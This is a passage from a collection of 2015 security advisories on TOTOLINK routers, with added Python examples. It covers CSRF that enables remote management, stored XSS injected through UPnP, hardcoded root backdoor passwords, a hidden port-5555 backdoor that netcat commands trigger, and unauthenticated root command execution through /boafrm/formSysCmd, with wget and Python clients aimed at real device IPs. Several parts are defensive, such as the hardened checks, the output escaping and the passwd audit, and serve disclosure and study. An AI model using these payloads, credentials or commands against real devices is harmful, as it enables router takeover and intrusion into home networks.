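ALLOWED_GO = {"firewallconf_accesslist.html", "netconf_wansetup.html"}


def parse_do_cmd(body):
    """Decode a do_cmd.htm POST body into (CMD, GO, {setting_id: value})."""
    fields = dict(parse_qsl(body, keep_blank_values=True))
    settings = {}
    for key, value in fields.items():
        if key.startswith("SET") and key[3:].isdigit():
            ident, _, val = value.partition("=")   # SETn carries "<id>=<value>"
            settings[int(ident)] = val
    return fields.get("CMD"), fields.get("GO"), settings


def referer_only_check(headers):
    """Vulnerable: a missing Referer passes, so a page loaded from a data:
    URL (or anything else the browser sends no Referer for) is accepted."""
    ref = headers.get("Referer")
    return ref is None or ref.startswith(DEVICE + "/")


def hardened_check(headers, session_token, body):
    """Require Origin (or Referer) naming the device, a per-session token in
    the body, and a GO value from the known page list (no open redirect)."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False                       # no provenance, no state change
    src, dev = urlsplit(source), urlsplit(DEVICE)
    if (src.scheme, src.netloc) != (dev.scheme, dev.netloc):
        return False
    fields = dict(parse_qsl(body, keep_blank_values=True))
    if fields.get("csrf_token") != session_token:
        return False
    return fields.get("GO", "") in ALLOWED_GO


# Constructed requests: the "enable remote management on 31337" form above,
# as a browser would post it (the '=' inside SETn values is URL-encoded).
CSRF_BODY = ("CMD=SYS&GO=firewallconf_accesslist.html&nowait=1"
             "&SET0=17367296%3D31337&SET1=17236224%3D1")
FROM_ADMIN_UI = {"Referer": DEVICE + "/firewallconf_accesslist.html"}
FROM_ATTACKER_PAGE = {"Referer": "http://attacker.example/"}
FROM_DATA_URL = {}   # browsers send no Referer for data: documents


def verdicts(headers, token="t0k3n"):
    """(referer-only result, hardened result) for one request shape,
    with the hardened check given a body that does carry the token."""
    return (referer_only_check(headers),
            hardened_check(headers, token, CSRF_BODY + "&csrf_token=" + token))


if __name__ == "__main__":
    print("parsed:", parse_do_cmd(CSRF_BODY))
    for label, hdrs in (("admin UI", FROM_ADMIN_UI),
                        ("attacker page", FROM_ATTACKER_PAGE),
                        ("data: URL", FROM_DATA_URL)):
        ro, hard = verdicts(hdrs)
        print(f"{label:14s} referer-only={ro} hardened={hard}")
```

The data: URL row is the whole story: the Referer-only rule returns True for it because there is nothing to compare, while the hardened rule returns False because provenance is required rather than merely checked when present. Note that the hardened check also refuses a well-formed request from the admin UI if the token is missing, which is the property that makes it resistant to any page the attacker controls.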
||||
|
||||
|
||||
|
||||
## Details - stored XSS and fun
|
||||
|
||||
There is a stored XSS, which can be injected using UPNP from the LAN,
|
||||
without authentication:
|
||||
|
||||
upnp> host send 0 WANConnectionDevice WANIPConnection AddPortMapping
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewPortMappingDescription
|
||||
Data Type: string
|
||||
Allowed Values: []
|
||||
Set NewPortMappingDescription value to: <script>alert("XSS");</script>
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewLeaseDuration
|
||||
Data Type: ui4
|
||||
Allowed Values: []
|
||||
Set NewLeaseDuration value to: 0
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewInternalClient
|
||||
Data Type: string
|
||||
Allowed Values: []
|
||||
Set NewInternalClient value to: <script>alert("XSS");</script>
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewEnabled
|
||||
Data Type: boolean
|
||||
Allowed Values: []
|
||||
Set NewEnabled value to: 1
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewExternalPort
|
||||
Data Type: ui2
|
||||
Allowed Values: []
|
||||
Set NewExternalPort value to: 80
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewRemoteHost
|
||||
Data Type: string
|
||||
Allowed Values: []
|
||||
Set NewRemoteHost value to: <script>alert("XSS");</script>
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewProtocol
|
||||
Data Type: string
|
||||
Allowed Values: ['TCP', 'UDP']
|
||||
Set NewProtocol value to: TCP
|
||||
|
||||
Required argument:
|
||||
Argument Name: NewInternalPort
|
||||
Data Type: ui2
|
||||
Allowed Values: []
|
||||
Set NewInternalPort value to: 80
|
||||
|
||||
|
||||
upnp>
|
||||
|
||||
|
||||
The UPNP webpage in the administration area
(http://192.168.0.1/popup_upnp_portmap.html) will then show:

[...]
<tr>
<td class=item_td>TCP</td>
<td class=item_td>21331</td>
<td class=item_td><script>alert("XSS")<script>alert("XSS");</script>:28777</td>
<td class=item_td><script>alert("XSS");</script></td>
</tr>
[...]


From my research, some fields overlap with others, which results in
bogus port numbers (21331 and 28777 above, where 80 was sent for both)
and truncated input data. A remote DoS against the upnpd process seems
easy to achieve.

Gaining remote code execution through UPnP exploitation is again left
as an exercise for the reader.
|
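The upnp tool session above is a SOAP call to the WANIPConnection:1 AddPortMapping action. The added Python below (mine, not from the advisory or from the firmware) builds that request as it goes on the wire, decodes it the way upnpd does, and renders the resulting port-mapping row twice: once as the admin page does (unescaped, reproducing the stored XSS) and once escaped on output with the internal client validated as an IPv4 address. The control URL is an assumption (the device's real one is not on the page; read it from the device's service description) and the argument values are constructed to mirror the session above.

```python
"""UPnP AddPortMapping on the wire, and the output-encoding bug behind the
stored XSS. Added example; the control URL is assumed (TOTOLINK's is not
on the page) and the render functions model the admin page, not its code.
"""
import html
import ipaddress
import xml.etree.ElementTree as ET

SERVICE = "urn:schemas-upnp-org:service:WANIPConnection:1"
CONTROL_URL = "/upnp/control/WANIPConn1"   # assumption; take it from the device's SCPD
ARG_ORDER = ("NewRemoteHost", "NewExternalPort", "NewProtocol", "NewInternalPort",
             "NewInternalClient", "NewEnabled", "NewPortMappingDescription",
             "NewLeaseDuration")


def add_port_mapping_request(host, args):
    """Raw HTTP request carrying the SOAP AddPortMapping call."""
    body = ('<?xml version="1.0"?>'
            '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
            's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
            f'<u:AddPortMapping xmlns:u="{SERVICE}">')
    for name in ARG_ORDER:                  # XML-escape so the payload survives parsing
        body += f"<{name}>{html.escape(str(args[name]))}</{name}>"
    body += "</u:AddPortMapping></s:Body></s:Envelope>"
    raw = body.encode()
    head = (f"POST {CONTROL_URL} HTTP/1.1\r\nHost: {host}\r\n"
            f'SOAPAction: "{SERVICE}#AddPortMapping"\r\n'
            'Content-Type: text/xml; charset="utf-8"\r\n'
            f"Content-Length: {len(raw)}\r\n\r\n")
    return head.encode() + raw


def parse_add_port_mapping(raw_request):
    """What upnpd ends up storing: the decoded argument values."""
    body = raw_request.split(b"\r\n\r\n", 1)[1]
    action = ET.fromstring(body).find(f".//{{{SERVICE}}}AddPortMapping")
    return {child.tag: child.text or "" for child in action}


def valid_internal_client(value):
    """An internal client must be a dotted-quad IPv4 address, nothing else."""
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return False


def render_row_vulnerable(m):
    """As on the page: values pasted into the HTML table without escaping."""
    return (f"<tr><td class=item_td>{m['NewProtocol']}</td>"
            f"<td class=item_td>{m['NewExternalPort']}</td>"
            f"<td class=item_td>{m['NewInternalClient']}:{m['NewInternalPort']}</td>"
            f"<td class=item_td>{m['NewPortMappingDescription']}</td></tr>")


def render_row_fixed(m):
    """Validate on input, escape on output, cap the free-text field."""
    if not valid_internal_client(m["NewInternalClient"]):
        raise ValueError("NewInternalClient is not an IPv4 address")
    e = html.escape
    return (f"<tr><td class=item_td>{e(m['NewProtocol'])}</td>"
            f"<td class=item_td>{e(m['NewExternalPort'])}</td>"
            f"<td class=item_td>{e(m['NewInternalClient'])}:{e(m['NewInternalPort'])}</td>"
            f"<td class=item_td>{e(m['NewPortMappingDescription'][:64])}</td></tr>")


# Constructed to mirror the upnp session above.
PAYLOAD = '<script>alert("XSS");</script>'
XSS_ARGS = {"NewRemoteHost": PAYLOAD, "NewExternalPort": 80, "NewProtocol": "TCP",
            "NewInternalPort": 80, "NewInternalClient": PAYLOAD, "NewEnabled": 1,
            "NewPortMappingDescription": PAYLOAD, "NewLeaseDuration": 0}

if __name__ == "__main__":
    mapping = parse_add_port_mapping(add_port_mapping_request("192.168.1.1", XSS_ARGS))
    print("vulnerable:", render_row_vulnerable(mapping))
    print("fixed     :", render_row_fixed(dict(mapping, NewInternalClient="192.168.1.10")))
```

Two points the comparison makes: the SOAP layer is not where the bug lives (the payload is XML-escaped in transit and comes out intact after parsing, exactly as it would from any UPnP client), and the field that carried the alert in the advisory's output, NewInternalClient, should never have accepted free text in the first place, so the fix is input validation for the typed fields plus output encoding for the one genuinely free-text field.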
||||
|
||||
|
||||
|
||||
## Vendor Response
|
||||
|
||||
Due to "un-ethical code" found in TOTOLINK products (= backdoors found
|
||||
in new TOTOLINK devices), TOTOLINK was not contacted in regard of this
|
||||
case.
|
||||
|
||||
|
||||
|
||||
## Report Timeline
|
||||
|
||||
* Apr 20, 2015: Vulnerabilities found by Pierre Kim in ipTIME devices.
|
||||
* Jun 20, 2015: Vulnerabilities confirmed with reliable PoCs.
|
||||
* Jun 25, 2015: Vulnerabilities found in TOTOLINK products by looking
|
||||
for similar ipTIME products.
|
||||
* Jul 16, 2015: A public advisory is sent to security mailing lists.
|
||||
|
||||
|
||||
|
||||
## Credit
|
||||
|
||||
These vulnerabilities were found by Pierre Kim (@PierreKimSec).
|
||||
|
||||
|
||||
|
||||
## Greetings
|
||||
|
||||
Big thanks to Alexandre Torres.
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
https://pierrekim.github.io/advisories/2015-totolink-0x01.txt
|
||||
|
||||
|
||||
|
||||
## Disclaimer
|
||||
|
||||
This advisory is licensed under a Creative Commons Attribution Non-Commercial
|
||||
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
|
122
platforms/hardware/webapps/37625.txt
Executable file
@ -0,0 +1,122 @@
|
|||
## Advisory Information
|
||||
|
||||
Title: Backdoor credentials found in 4 TOTOLINK router models
|
||||
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x03.txt
|
||||
Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-credentials-found-in-4-TOTOLINK-products.html
|
||||
Date published: 2015-07-16
|
||||
Vendors contacted: None
|
||||
Release mode: 0days, Released
|
||||
CVE: no current CVE
|
||||
|
||||
|
||||
|
||||
## Product Description

TOTOLINK is a sister brand of ipTime, which holds over 80% of the SOHO
market in South Korea.
TOTOLINK produces routers, wifi access points and other network
devices. Their products are sold worldwide.
|
||||
|
||||
|
||||
|
||||
## Vulnerabilities Summary

Backdoor credentials are present in several TOTOLINK products.

It affects 4 TOTOLINK products (firmwares come from totolink.net and
from totolink.cn):

G150R-V1 : last firmware 1.0.0-B20150330
(TOTOLINK-G150R-V1.0.0-B20150330.1734.web)
G300R-V1 : last firmware 1.0.0-B20150330
(TOTOLINK-G300R-V1.0.0-B20150330.1816.web)
N150RH-V1 : last firmware 1.0.0-B20131219
(TOTOLINK-N150RH-V1.0.0-B20131219.1014.web)
N301RT-V1 : last firmware 1.0.0 (TOTOLINK N301RT_V1.0.0.web)

They allow an attacker on the LAN to log in to the device over telnet
with 2 different accounts, root and 'onlime_r', both of which have
root privileges (uid 0).
|
||||
|
||||
|
||||
|
||||
## Details - G150R-V1 and G300R-V1

The init.d script executes these commands when the router starts:

[...]
cp /etc/passwd_orig /var/passwd
cp /etc/group_orig /var/group
telnetd&
[...]


The /etc/passwd_orig file contains the backdoor credentials (note that
both accounts have uid 0 and share the same md5crypt hash, so they share
the same password):

root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null

The corresponding passwords are:

root:12345
onlime_r:12345
|
||||
|
||||
|
||||
## Details - N150RH-V1 and N301RT

The init.d script executes these commands when the router starts:

[...]
#start telnetd
telnetd&
[...]

The binary /bin/sysconf executes this command when the router starts:

system("cp /etc/passwd.org /var/passwd 2> /dev/null")


The /etc/passwd.org file contains the same backdoor credentials:

root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null

The corresponding passwords are:

root:12345
onlime_r:12345
|
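Both Details sections rest on one claim: the $1$01OyWDBw$... field is an md5crypt hash of 12345. The added Python below (mine, not from the advisory) re-derives that hash in pure Python, so it does not depend on a crypt(3) that may lack md5crypt, and runs the short passwd audit a firmware review does: it flags uid-0 accounts with a real shell, accounts that share a hash (same salt and digest means same password, before any cracking), and hashes that match a small wordlist. The passwd lines are the ones quoted above; the wordlist and the audit rules are the example's own, constructed here.

```python
"""Pure-Python md5crypt ($1$) plus a small passwd-file audit.

Added example, not from the advisory: it confirms the quoted hash is
12345 and flags what a firmware review looks for in such a file.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def md5crypt(password: bytes, salt: bytes) -> str:
    """FreeBSD/glibc md5crypt: returns '$1$<salt>$<22 chars>'."""
    salt = salt[:8]
    ctx = hashlib.md5(password + b"$1$" + salt)
    alt = hashlib.md5(password + salt + password).digest()
    pl = len(password)
    while pl > 0:                          # mix in alt, one byte per password byte
        ctx.update(alt[:min(pl, 16)])
        pl -= 16
    i = len(password)
    while i:                               # the "something really weird" step
        ctx.update(b"\0" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                  # deliberate slowdown loop
        c = hashlib.md5()
        c.update(password if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(password)
        c.update(final if i & 1 else password)
        final = c.digest()

    def to64(v, n):
        out = ""
        for _ in range(n):
            out += ITOA64[v & 0x3F]
            v >>= 6
        return out

    groups = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    enc = "".join(to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                  for a, b, c in groups)
    enc += to64(final[11], 2)
    return "$1$" + salt.decode() + "$" + enc


def verify(password: bytes, hash_field: str) -> bool:
    """Check a password against a $1$ field taken from passwd/shadow."""
    if not hash_field.startswith("$1$"):
        return False
    salt = hash_field[3:].split("$", 1)[0]
    return md5crypt(password, salt.encode()) == hash_field


def audit_passwd(text: str, wordlist):
    """Findings per account: uid-0 with a login shell, shared hashes, weak passwords."""
    rows = [l.split(":") for l in text.splitlines() if l and not l.startswith("#")]
    rows = [r for r in rows if len(r) == 7]
    by_hash = {}
    for r in rows:
        by_hash.setdefault(r[1], []).append(r[0])
    findings = {}
    for name, hsh, uid, _gid, _gecos, _home, shell in rows:
        notes = []
        if uid == "0" and shell not in ("/dev/null", "/bin/false", "/sbin/nologin"):
            notes.append("uid 0 with login shell")
        if hsh.startswith("$") and len(by_hash[hsh]) > 1:
            notes.append("hash shared with " + ",".join(n for n in by_hash[hsh] if n != name))
        for word in wordlist:
            if verify(word, hsh):
                notes.append("password is " + word.decode())
                break
        if notes:
            findings[name] = notes
    return findings


# The /etc/passwd_orig content quoted in the advisory, and a constructed wordlist.
PASSWD_ORIG = """root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/:/dev/null
"""
WORDLIST = [b"admin", b"password", b"12345", b"totolink"]

if __name__ == "__main__":
    for user, notes in audit_passwd(PASSWD_ORIG, WORDLIST).items():
        print(user, "->", "; ".join(notes))
```

The shared-hash check is the cheap, hash-agnostic signal: two accounts with byte-identical $1$ fields were set to the same password by whoever built the image, which is worth reporting even when the wordlist misses. For a firmware you are reviewing, point audit_passwd at every passwd-like file the init scripts copy into place (/etc/passwd_orig and /etc/passwd.org here), not just /etc/passwd.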
||||
|
||||
|
||||
|
||||
## Vendor Response
|
||||
|
||||
TOTOLINK was not contacted in regard of this case.
|
||||
|
||||
|
||||
|
||||
## Report Timeline
|
||||
|
||||
* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares.
|
||||
* Jun 26, 2015: working PoCs.
|
||||
* Jul 16, 2015: A public advisory is sent to security mailing lists.
|
||||
|
||||
|
||||
|
||||
## Credit
|
||||
|
||||
These backdoor credentials were found by Pierre Kim (@PierreKimSec).
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
https://pierrekim.github.io/advisories/2015-totolink-0x03.txt
|
||||
|
||||
|
||||
|
||||
## Disclaimer
|
||||
|
||||
This advisory is licensed under a Creative Commons Attribution Non-Commercial
|
||||
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
|
199
platforms/hardware/webapps/37626.txt
Executable file
@ -0,0 +1,199 @@
|
|||
## Advisory Information
|
||||
|
||||
Title: Backdoor and RCE found in 8 TOTOLINK router models
|
||||
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
|
||||
Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html
|
||||
Date published: 2015-07-16
|
||||
Vendors contacted: None
|
||||
Release mode: 0days, Released
|
||||
CVE: no current CVE
|
||||
|
||||
|
||||
|
||||
## Product Description

TOTOLINK is a sister brand of ipTime, which holds over 80% of the SOHO
market in South Korea.
TOTOLINK produces routers, wifi access points and other network
devices. Their products are sold worldwide.
|
||||
|
||||
|
||||
|
||||
## Vulnerabilities Summary

A backdoor is present in several TOTOLINK products.
This was confirmed by analysing the latest firmwares and by testing
the backdoor against live routers.

At least 8 TOTOLINK products are affected (firmwares come from
totolink.net and from totolink.cn):

- A850R-V1 : until last firmware TOTOLINK-A850R-V1.0.1-B20150707.1612.web
- F1-V2 : until last firmware F1-V2.1.1-B20150708.1646.web
- F2-V1 : until last firmware F2-V2.1.0-B20150320.1611.web
- N150RT-V2 : until last firmware TOTOLINK-N150RT-V2.1.1-B20150708.1548.web
- N151RT-V2 : until last firmware TOTOLINK-N151RT-V2.1.1-B20150708.1559.web
- N300RH-V2 : until last firmware TOTOLINK-N300RH-V2.0.1-B20150708.1625.web
- N300RH-V3 : until last firmware TOTOLINK-N300RH-V3.0.0-B20150331.0858.web
- N300RT-V2 : until last firmware TOTOLINK-N300RT-V2.1.1-B20150708.1613.web


By sending a crafted request to the WAN IP, an attacker can open the
HTTP remote management interface on the Internet.
Then the attacker can use a Remote Code Execution in the HTTP remote
management interface through the hidden /boafrm/formSysCmd form,
bypassing the authentication system.

We estimate that roughly 50,000 routers are affected by this backdoor.
|
||||
|
||||
|
||||
|
||||
## Details - backdoor

The init.d script executes the /bin/skt binary when the router starts:

cat etc/init.d/rcS
[...]
# start web server
boa
skt&


skt is a small MIPS binary which is a client/server program. The arguments are:

server: ./skt
client: ./skt host cmd


The binary can be run on an x86_64 machine with QEMU user-mode emulation,
from the root of the extracted firmware:

sudo chroot . ./qemu-mips-static ./bin/skt


Used without arguments, skt launches a TCP daemon on port 5555 on
every interface (including WAN), acting as an ECHO server.
Used with arguments, skt sends a TCP packet containing the command
to the specified IP on port 5555.

The analysis of the binary running on the TOTOLINK devices (for more
details, read
https://pierrekim.github.io/blog/2015-07-XX-backdoor-in-TOTOLINK-products.html
) shows that the server mode responds to 3 commands by silently executing
system() in the background:

o By sending "hel,xasf" to the device, the device will execute:
    iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT

  This opens the HTTP remote management interface on port 80 on
  the eth1 interface, which is the WAN interface by default.

o By sending "oki,xasf" to the device, the device will execute:
    iptables -D INPUT -p tcp --dport 80 -i eth1 -j ACCEPT

  This closes the HTTP remote management interface.

o By sending "bye,xasf" to the device, the device does nothing.


The iptables commands in the backdoor are hardcoded with "eth1".
The "open" command therefore only exposes the interface on devices using
DHCP or static IP WAN connections, where the WAN IP is attached to the
eth1 device.

Devices using PPPoE connections are not affected by it, because the WAN IP
is attached to the ppp device, as seen below:

totolink# ifconfig
ppp0      Link encap:Point-to-Point Protocol
          inet addr:X.X.X.X  P-t-P:X.X.X.X  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1438  Metric:1
          RX packets:17308398 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2605290 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:64
          RX bytes:2803138455 (2.6 GiB)  TX bytes:277402492 (264.5 MiB)


An attacker can use these simple netcat commands to test the backdoor:

To open the HTTP remote management interface on the Internet:

echo -ne "hel,xasf" | nc <ip> 5555

To close the HTTP remote management interface on the Internet:

echo -ne "oki,xasf" | nc <ip> 5555

To detect a vulnerable router:

echo -ne "GET / HTTP/1.1" | nc <ip> 5555

If "GET / HTTP/1.1" comes back in the answer, you have likely found a
vulnerable router: skt echoes the bytes it receives, whereas a real HTTP
server never echoes the request line.


## Details - RCE in the management interface

A hidden form in the latest firmware allows an attacker to execute
commands as root by sending an HTTP request, without authenticating:

POST /boafrm/formSysCmd HTTP/1.1

sysCmd=<cmd>&apply=Apply&msg=


An attacker can use wget to execute commands on the remote device:

wget --post-data='sysCmd=<cmd>&apply=Apply&msg=' http://ip//boafrm/formSysCmd


For instance, sending this HTTP request to the management interface
will reboot the device:

POST /boafrm/formSysCmd HTTP/1.1

sysCmd=reboot&apply=Apply&msg=

This wget command will do the same job:

wget --post-data='sysCmd=reboot&apply=Apply&msg=' http://ip//boafrm/formSysCmd


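The formSysCmd request with the headers the shorthand above leaves implicit, as an added example that is not part of the advisory and not TOTOLINK's code. The client builds and sends the same form body as the wget command; the server side is a constructed loopback stand-in for the Boa handler that records the submitted sysCmd instead of executing it and, like the real endpoint, checks no credential. Handler and function names are assumptions.

```python
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


class MockFormSysCmd(BaseHTTPRequestHandler):
    """Constructed loopback stand-in for Boa's /boafrm/formSysCmd handler
    (not TOTOLINK's code). Records the sysCmd value instead of running it;
    no session or credential is checked, which is the flaw in question."""
    received = []

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        # The advisory's wget URL carries a doubled slash, so normalise
        # leading slashes before comparing the path.
        if self.path.lstrip("/") == "boafrm/formSysCmd" and "sysCmd" in fields:
            MockFormSysCmd.received.append(fields["sysCmd"][0])
            self.send_response(200)
        else:
            self.send_response(404)
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_mock_boa(host="127.0.0.1", port=0):
    """Start the stand-in on an ephemeral port; the real service is port 80."""
    srv = HTTPServer((host, port), MockFormSysCmd)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def form_syscmd(host, cmd, port=80, timeout=5.0):
    """Issue the sysCmd POST from the advisory and return the HTTP status.
    urlopen adds Content-Type: application/x-www-form-urlencoded and
    Content-Length; urlencode percent-encodes the command so spaces and
    slashes survive the trip."""
    body = urllib.parse.urlencode(
        {"sysCmd": cmd, "apply": "Apply", "msg": ""}).encode()
    req = urllib.request.Request(
        f"http://{host}:{port}/boafrm/formSysCmd", data=body, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


if __name__ == "__main__":
    srv = start_mock_boa()
    port = srv.server_address[1]
    print(form_syscmd("127.0.0.1", "reboot", port=port))
    print(form_syscmd("127.0.0.1", "cat /etc/passwd.org", port=port))
    print("commands the device would have run:", MockFormSysCmd.received)
    srv.shutdown()
```

Against a real device the call is form_syscmd(wan_ip, "reboot") once the backdoor has opened port 80 on eth1; the stand-in exists only so the request shape can be exercised offline.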
## Vendor Response

TOTOLINK was not contacted regarding this issue.


## Report Timeline

* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares.
* Jun 26, 2015: Working PoCs with RCE.
* Jul 13, 2015: Updated firmwares confirmed vulnerable.
* Jul 16, 2015: A public advisory is sent to security mailing lists.


## Credit

These vulnerabilities were found by Alexandre Torres and Pierre Kim
(@PierreKimSec).


## References

https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html


## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/